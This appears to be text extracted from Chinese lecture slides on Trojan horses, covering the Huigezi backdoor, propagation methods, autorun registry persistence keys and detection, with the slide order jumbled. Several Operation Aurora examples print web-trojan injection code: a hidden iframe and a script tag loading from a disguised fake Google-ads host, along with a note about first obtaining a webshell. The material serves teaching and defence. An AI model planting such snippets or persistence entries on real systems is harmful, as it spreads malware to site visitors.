。
• 第五代木马反弹式木马。
木马实例演示 （example of a simple Trojan）
• 演示木马：灰鸽子 • 简介 灰鸽子，学名为win32.hack.huigezi，是国内一款著名后门程序 ； 比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者 ，功能强大，有6万多种变种； 开发者是葛军，该木马的客户端和服务端都是采用Dephi编写 ； 服务端对客户端连接方式有多种，使得处于各种网络环境的用 户都可能中毒，包括局域网用户（通过代理上网）、公网用户 和ADSL拨号用户等； 使用了进程隐藏、线程注入、重复加壳等多种病毒技术，连续 三年被国内各大杀毒厂商评选为“年度十大病毒”。
• 命令广播：可以对自动上线主机进行命令广播，如关 机、重启、打开网页，筛选符合条件的机等，点一个 按钮就可以让N台机器同时关机或其它操作； • 消息广播：可以向对方主机发送消息；
木马植入方法（propagation mechanisms）
直接攻击
电子邮件
经过伪装的 木马被植入 目标机器
ቤተ መጻሕፍቲ ባይዱ
文件下载
浏览网页
例子(CVE2010-0249,Operation Aurora)
• • • • • • • • function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else {document.cookie = "Cookie1=risb;expires="+ Then.toGMTString() • document.writeln("<iframe src=http://pagead2.googlesyndication.xx.xx/pagead/aur ora.htm width=0 height=0></iframe>"); • }}Get();
b）RunServicesOnce注册表服务项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunServicesOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunServicesOnce （3）修改系统配置文件 a）在Win.ini中启动 在Win.ini的[windows]字段中有启动命令“load=”和 “run=”，在一般情况下“＝”后面是空白的，如果有 后跟程序，比方说是这个样子： run=c:\windows\file.exe load=c:\windows\file.exe file.exe就会在计算机启动的时候启动。
合并文件
+
QQ等
1、直接攻击法 利用系统漏洞（如MS06-14、MS07-17和MS07004,MS08-067），通过端口扫描，漏洞扫描和网络渗 透，将木马程序发送并安装到远程计算机中，这种方 法方便、快捷，攻击效果比较明显，很多病毒都是通 过这种方法进行传播。 2、文件下载法 将木马程序与软件捆绑在一起，或者将木马伪装成破解 工具、漂亮的屏保、图像文件或游戏程序等，放在FTP 服务器、WEB站点或者BT站点提供下载，当用户下载 并打开或者运行这些文件的同时安装了木马。 3、U盘传染法 利用Windows的自动播放功能，双击该U盘以后，木马就 自动运行，并成功植入到目标用户机器中。
c）Winlogon注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon d）Load注册表启动项 HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\Curr entVersion\Windows\load （2）注册成系统服务 a ) RunServices注册表服务项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\RunServices
例子(CVE2010-0188)
例子(CVE2010-0188)
木马的行为特征 Q：How you can know if you are under Trojan horse attack?
木马的运行主要分为两个阶段：
一是木马植入阶段，主要是指木马安装时，释 放服务端文件以及修改系统信息； 二是木马植入后阶段，这主要是指木马成功安 装并运行后，具有了系统操作、通信等行为 特征。
灰鸽子木马强大功能
• 对远程计算机文件管理： 模仿Windows 资源管理器，可以对文件进行复制、粘 贴、删除，重命名、远程运行等,可以上传下载文件或 文件夹,操作简单易用； • 远程控制命令： 查看远程系统信息、剪切板查看、进程管理、窗口管理 、插件功能、服务管理(包括启动服务、停止服务、删 除服务、设置服务)、共享管理(包括查看共享、新建共 享、删除共享)、代理服务、MS-Dos模拟； • 捕获屏幕： 不但可以连续的捕获远程电脑屏幕，还能把本地的鼠标 及键盘传动作送到远程实现实时控制功能； • 视频监控： 可以控制远程计算机的摄像头，在服务端操作人员完 全不知情的情况下，控制端可以把摄像头目标中的拍 摄下来；
木马技术概述
内容提要
木马的概念，特点与分类 木马发展历史 木马实例演示 木马植入方法 木马行为特征 木马程序分析示例 木马设计 木马分析与木马检测 总结
木马概念
• 木马的典故： 木马，全称为“特洛伊木马”（trojan horse），其得 名于公元前十二世纪初 “特洛伊战争 ” • 木马，完成特殊任务的程序其实质只是一个在隐蔽、 非授权情况下安装和运行的网络客户端/服务器程序。 • 客户端:又叫控制端，对服务端进行远程控制的 一方 • 服务端:被控制端远程控制的一方
3、电子邮件传播法 第一种是通过邮件附件进行传播。 第二种通过邮件内容进行传播。 4、网页挂马法(CVE2010-0249,Operation Aurora，0day) CVE - Common Vulnerabilities and Exposures 这种方法是目前最流行的木马植入方法，主要是利用IE 浏览器的漏洞进行传播的，攻击者在网页上加入溢出 代码，用户在浏览网页或者点击某一个链接时，IE浏览 器溢出，溢出以后恶意代码就可以自动从网站的指定 位置下载木马文件并执行 5、应用软件漏洞法(CVE2009-4324, CVE2010-0188) 将木马文件绑定在Word、Excel、PowerPoint、Access、 pdf、Winrar等文档中，通过QQ、GoogleTalk、MSN等 P2P聊天工具或者电子邮件将这些文件发送给目标用户， 目标用户正常打开这些文档的同时，绑定在这些文档 中的木马就自动运行。
• 现在一般都是服务端主动连接客户端
• 木马的工作流程
木马的特点
• 隐藏性，
– – – – (1)在任务栏中隐藏，不产生任何窗口 (2)在任务管理器里隐藏 (3)木马文件的隐藏 (4)木马通信的隐藏
• 自启动性， • 自恢复功能
– 木马会在多处留下备份，如果其中某些文件被查杀 以后，会通过备份再次激活，或者感染其他的正常 文件，木马也会再次激活。
木马的分类
• 按功能分类
– 远程控制型木马－－如：灰鸽子、冰河 – 密码盗窃型木马－－如：阿拉QQ大盗 – 恶作剧型木马
• 按连接方式分类
– 正向连接型木马－－如：冰河 – 反弹式木马－－如：网络神偷，灰鸽子
• 按通信协议分类
– TCP木马：主流，如BO、冰河等 – UDP木马：利用UDP协议进行数据传送 – ICMP木马：利用ICMP协议进行数据传送，如lionbackdoor
木马植入阶段
1、自启动设置 （1）在注册表设置自启动项 a）Run注册表启动项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run b）RunOnce注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunOnce WindowsXPHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnceEx
6、社会工程学法 通过各种方法获取目标用户的信任，然后通过向对方发 绑定了木马的文件引诱对方点击，或者直接在他机器上 运行木马。
推荐读物——《入侵的艺术》 by Kevin Mitnick
例子(CVE2010-0249)
• 要入侵网站拿到网站的webshell • 在网页上插入挂马代码 • 看下面代码，模仿的谷歌广告代码调用的脚本地址， 而且是调用的图片，如果不仔细看是看不出来的。只 要在网页上插入这么一段代码，马挂上了。 • <script src=http://pagead2.googlesyndication.xx.xx/pagead/log o.gif></script> • 这个图片地址空间是挂马者自己的租用的空间，域名 模仿了一些知名网络服务的域名，目的就是让人不易 察觉